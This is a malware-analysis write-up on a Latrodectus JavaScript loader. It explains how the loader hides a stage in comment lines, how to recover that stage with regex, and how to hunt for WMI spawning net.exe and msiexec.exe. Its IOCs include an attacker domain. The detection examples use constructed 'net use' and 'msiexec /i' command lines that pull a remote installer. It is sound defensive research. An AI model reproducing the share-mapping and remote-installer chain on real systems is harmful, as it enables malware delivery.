Latrodectus Loader Analysis – Deobfuscation and Detection

A Latrodectus JavaScript loader heavily obfuscates its payload with thousands of junk comments and embeds a secondary script inside comment lines that, when extracted, maps a network share and runs a remote upd.msi via msiexec. Deobfuscation is done with regex and CyberChef to extract lines beginning with four slashes, revealing WMI-driven execution of net.exe and msiexec.exe against sokingscrosshotel[.]com. #Latrodectus #sokingscrosshotel

Keypoints

  • Initial sample (SHA256 71fb25cc4c05ce9dd94614ed781d85a50dccf69042521abc6782d48df85e6de9) is a large 845KB JavaScript file indicating heavy obfuscation.
  • The file contains thousands of junk comments generated by an obfuscator; functional code appears sparsely between these comments.
  • Removing lines that begin with ‘//’ via regex reduces the file to ~37 lines, but those lines reveal logic that reads comment-lines beginning with ‘////’ and executes them.
  • Using CyberChef with a regex capture group to extract lines starting with ‘////’ yields the embedded second-stage script.
  • The deobfuscated script maps a network share at sokingscrosshotel[.]com via ‘net use’, then runs upd.msi with msiexec.exe and later removes the mapped drive with WScript.Network.RemoveNetworkDrive.
  • Execution is performed via WMI (wmiprvse.exe spawning net.exe/msiexec.exe), providing clear detection opportunities by hunting for these process creation patterns and uncommon share names.

MITRE Techniques

  • [T1027] Obfuscated Files or Information – The script uses extensive junk comments to hide functionality (‘the script contains a huge number of junk comments’).
  • [T1064] Scripting – Malicious actions are implemented in a JavaScript file that is delivered and executed as script code (‘the malware is delivered and executed as a JavaScript file’).
  • [T1047] Windows Management Instrumentation – WMI is leveraged to execute commands such as net.exe and msiexec.exe (‘The malware leverages wmi to execute the net.exe and msiexec.exe commands’).
  • [T1105] Ingress Tool Transfer (Remote File Copy) – The loader retrieves and executes a remote upd.msi file from a network share (‘the malware attempts to execute an upd.msi file using msiexec.exe’).
  • [T1135] Network Share Discovery/Use – The script maps and uses a network share (sokingscrosshotel[.]com) via ‘net use’ for payload retrieval (‘the malware attempts to map to a network drive at sokingscrosshotel[.]com’).
  • [T1106] Native API – The code uses the WScript.Network object’s RemoveNetworkDrive method to remove the mapped share after execution (‘the network drive is removed using RemoveNetworkDrive from the WScript.Network object’).
  • [T1059] Command and Scripting Interpreter – The actor spawns system commands (net.exe, msiexec.exe) through script-driven execution to perform file transfer and execution (‘Once the drive is connected, the malware attempts to execute an upd.msi file using msiexec.exe’).

Indicators of Compromise

  • [SHA256] initial sample – 71fb25cc4c05ce9dd94614ed781d85a50dccf69042521abc6782d48df85e6de9
  • [Domain] network share used as payload host – sokingscrosshotel[.]com
  • [File name] remote installer executed – upd.msi
  • [Process names] execution orchestration – wmiprvse.exe spawning net.exe, msiexec.exe
  • [Repository/uploader] sample source/context – Malware Bazaar upload by pr0xylife

The technical procedure begins by fetching the large JavaScript sample (SHA256 71fb25c…) identified on Malware Bazaar; its 845KB size and Visual Studio Code minimap reveal thousands of obfuscating comment lines inserted by an obfuscator, with intermittent chunks of functional code between them. Analysts should open the file in a text editor to confirm the pattern: most lines are junk comments, while meaningful code appears sporadically and the script contains logic to read its own contents and treat comment-lines as executable payload.

To deobfuscate, remove single-line comments and then extract the deeper payload: first apply a regex that strips lines beginning with ‘//’ to reduce noise, which yields a minimal scaffold (~37 lines) that reads comment blocks. Next, extract lines that begin with four slashes (‘////’) using CyberChef or another regex-capable tool with a capture group and “List capture groups” to isolate the embedded script without the leading slashes. This reveals the second/third-stage script content for review.
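The two-step procedure above, written as an added Python example rather than the CyberChef recipe the analysis used (this is not code from the original write-up). The loader text it runs on is constructed to mimic only the layout described here (junk ‘//’ lines, a few scaffold lines, hidden lines starting with ‘////’); it carries no real payload, and the scaffold lines (readSelf, hidden) are placeholders.

```python
"""Recover the comment-embedded stage of a Latrodectus-style JavaScript loader.

Added example, not code from the original analysis. It reproduces the two-step
procedure in Python instead of CyberChef: (1) strip every line that starts with
'//' to expose the small scaffold, (2) go back to the ORIGINAL text and collect
the lines that start with four slashes, minus the slashes. The loader text below
is constructed to mimic the layout only; it contains no real payload.
"""
import re

# Constructed stand-in for the 845KB sample: junk '//' comments, a few scaffold
# lines, and a hidden script whose lines begin with '////'. Scaffold code is a
# placeholder (readSelf() is not a real function).
CONSTRUCTED_LOADER = "\n".join([
    "// 7e3f2a junk comment emitted by the obfuscator",
    "var hidden = [];",
    "// another decoy that never executes",
    "////WScript.Echo('hidden stage: line one');",
    "/// three slashes: still junk, not payload",
    "var selfText = readSelf();  // placeholder for the self-reading logic",
    "////WScript.Echo('hidden stage: line two');",
    "//x almost, but not four slashes",
    "    ////WScript.Echo('hidden stage: line three');",
    "// trailing junk",
])

COMMENT_LINE = re.compile(r"^\s*//")         # step 1: any line that begins with '//'
HIDDEN_LINE = re.compile(r"^\s*////(.*)$")   # step 2: capture what follows the four slashes


def strip_comment_lines(script: str) -> list[str]:
    """Step 1: drop every line beginning with '//'.

    This also drops the '////' lines, which is exactly why the leftover scaffold
    (~37 lines in the real sample) is what tells the analyst to go looking for them.
    """
    return [ln for ln in script.splitlines() if not COMMENT_LINE.match(ln)]


def extract_hidden_stage(script: str) -> str:
    """Step 2: the CyberChef 'regex capture group + List capture groups' step.

    Runs on the ORIGINAL script, not on the output of step 1, and returns the
    embedded stage with the leading slashes removed, one line per hidden line.
    """
    hidden = []
    for ln in script.splitlines():
        m = HIDDEN_LINE.match(ln)
        if m:
            hidden.append(m.group(1))
    return "\n".join(hidden)


def deobfuscate(script: str) -> dict:
    """Run both steps and return the line counts an analyst would report."""
    scaffold = strip_comment_lines(script)
    stage = extract_hidden_stage(script)
    return {
        "total_lines": len(script.splitlines()),
        "scaffold": scaffold,
        "hidden_stage": stage,
        "hidden_line_count": len(stage.splitlines()) if stage else 0,
    }


if __name__ == "__main__":
    result = deobfuscate(CONSTRUCTED_LOADER)
    print(f"{result['total_lines']} lines -> {len(result['scaffold'])} scaffold lines")
    print("--- hidden stage ---")
    print(result["hidden_stage"])
```

Running step 2 against the original file rather than the step 1 output matters: step 1's ‘//’ regex also removes the ‘////’ lines, so the scaffold it leaves is useful only as the clue that the comment lines are the real payload. Feed the recovered stage back through the same two functions; loaders of this kind can nest the trick more than once.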

The revealed payload maps a network share (sokingscrosshotel[.]com) via ‘net use’, executes upd.msi using msiexec.exe, and then removes the mapped drive via WScript.Network.RemoveNetworkDrive; WMI is used to spawn these processes (wmiprvse.exe -> net.exe/msiexec.exe). For detection and hunting, collect process creation logs and look for wmiprvse.exe spawning net.exe or msiexec.exe with uncommon share or drive names, and monitor for executions of msiexec.exe referencing remote installers or uncommon UNC paths.
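The hunting guidance above, as an added Python example over constructed process-creation events (not code from the original analysis). The events are a pipe-delimited rendering of three Sysmon Event ID 1 fields (ParentImage, Image, CommandLine); the share host, drive letter and paths are placeholders, not indicators from the page, and the rule names, the share-host allowlist and the “only C: is local” assumption are mine.

```python
"""Hunt process-creation telemetry for the wmiprvse.exe -> net.exe / msiexec.exe chain.

Added example, not part of the original analysis. The log format is a constructed
pipe-delimited rendering of three Sysmon Event ID 1 fields; adapt parse_event()
to whatever your SIEM exports. Hosts and paths in the sample events are placeholders.
"""
import re
from dataclasses import dataclass

# Constructed sample events: the first two reproduce the page's chain, the rest are
# benign look-alikes that a good rule must leave alone.
CONSTRUCTED_EVENTS = [
    r"ParentImage=C:\Windows\System32\wbem\WmiPrvSE.exe|Image=C:\Windows\System32\net.exe|CommandLine=net use Z: \\share.example.invalid\files",
    r"ParentImage=C:\Windows\System32\wbem\WmiPrvSE.exe|Image=C:\Windows\System32\msiexec.exe|CommandLine=msiexec.exe /i Z:\upd.msi /qn",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\msiexec.exe|CommandLine=msiexec.exe /i C:\Users\alice\Downloads\tool.msi",
    r"ParentImage=C:\Windows\System32\services.exe|Image=C:\Windows\System32\msiexec.exe|CommandLine=msiexec.exe /i \\deploy.corp.example\sw\agent.msi /qn",
    r"ParentImage=C:\Windows\System32\wbem\WmiPrvSE.exe|Image=C:\Windows\System32\WerFault.exe|CommandLine=WerFault.exe -u -p 4242",
]

# Assumed allowlist of share hosts that legitimately serve installers here.
KNOWN_SHARE_HOSTS = {"deploy.corp.example"}
# Assumption: only C: is a local disk, so any other drive letter is a mapped share.
LOCAL_DRIVES = {"C"}

WMI_CHILDREN = {"net.exe", "msiexec.exe"}
UNC_HOST = re.compile(r"\\\\([A-Za-z0-9._-]+)\\")                   # \\host\share...
DRIVE_MSI = re.compile(r"\b([A-Za-z]):\\\S*\.msi\b", re.IGNORECASE)  # Z:\path\file.msi


@dataclass
class Event:
    parent: str
    image: str
    cmdline: str


def parse_event(line: str) -> Event:
    """Parse one constructed 'Key=Value|Key=Value' record (no '|' inside values)."""
    fields = dict(part.split("=", 1) for part in line.split("|"))
    return Event(fields["ParentImage"], fields["Image"], fields["CommandLine"])


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyze(line: str, known_hosts: set, local_drives: set = LOCAL_DRIVES) -> list:
    """Return the list of rule names that fire on one event (empty if benign)."""
    ev = parse_event(line)
    parent, image = basename(ev.parent), basename(ev.image)
    known = {h.lower() for h in known_hosts}
    unknown_hosts = {h.lower() for h in UNC_HOST.findall(ev.cmdline)} - known
    findings = []
    # Rule 1: the WMI provider host spawning net.exe or msiexec.exe.
    if parent == "wmiprvse.exe" and image in WMI_CHILDREN:
        findings.append("wmi_spawn")
    # Rule 2: 'net use' against a share host that is not on the allowlist.
    if image == "net.exe" and re.search(r"\buse\b", ev.cmdline, re.I) and unknown_hosts:
        findings.append("net_use_unknown_share")
    # Rule 3: msiexec.exe pulling an installer from a UNC path or a non-local drive.
    if image == "msiexec.exe":
        if unknown_hosts:
            findings.append("msiexec_unc_unknown_host")
        m = DRIVE_MSI.search(ev.cmdline)
        if m and m.group(1).upper() not in local_drives:
            findings.append("msiexec_nonlocal_drive")
    return findings


def hunt(lines: list, known_hosts: set) -> dict:
    """Map event index -> fired rules, for events that fired at least one rule."""
    results = {}
    for i, line in enumerate(lines):
        fired = analyze(line, known_hosts)
        if fired:
            results[i] = fired
    return results


if __name__ == "__main__":
    for idx, rules in hunt(CONSTRUCTED_EVENTS, KNOWN_SHARE_HOSTS).items():
        print(f"event {idx}: {', '.join(rules)}")
```

Two of the five constructed events fire: the net.exe mapping to an unknown host and the msiexec.exe run from a mapped drive, both under wmiprvse.exe. The explorer.exe-launched local installer and the services.exe deployment from the allowlisted host stay quiet, which is the point of keeping a share allowlist next to the parent/child rule: the parent/child pair alone is the strongest signal, but the share and drive checks are what separate this chain from routine software deployment.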

Read more: https://embee-research.ghost.io/latrodectus-script-deobfuscation/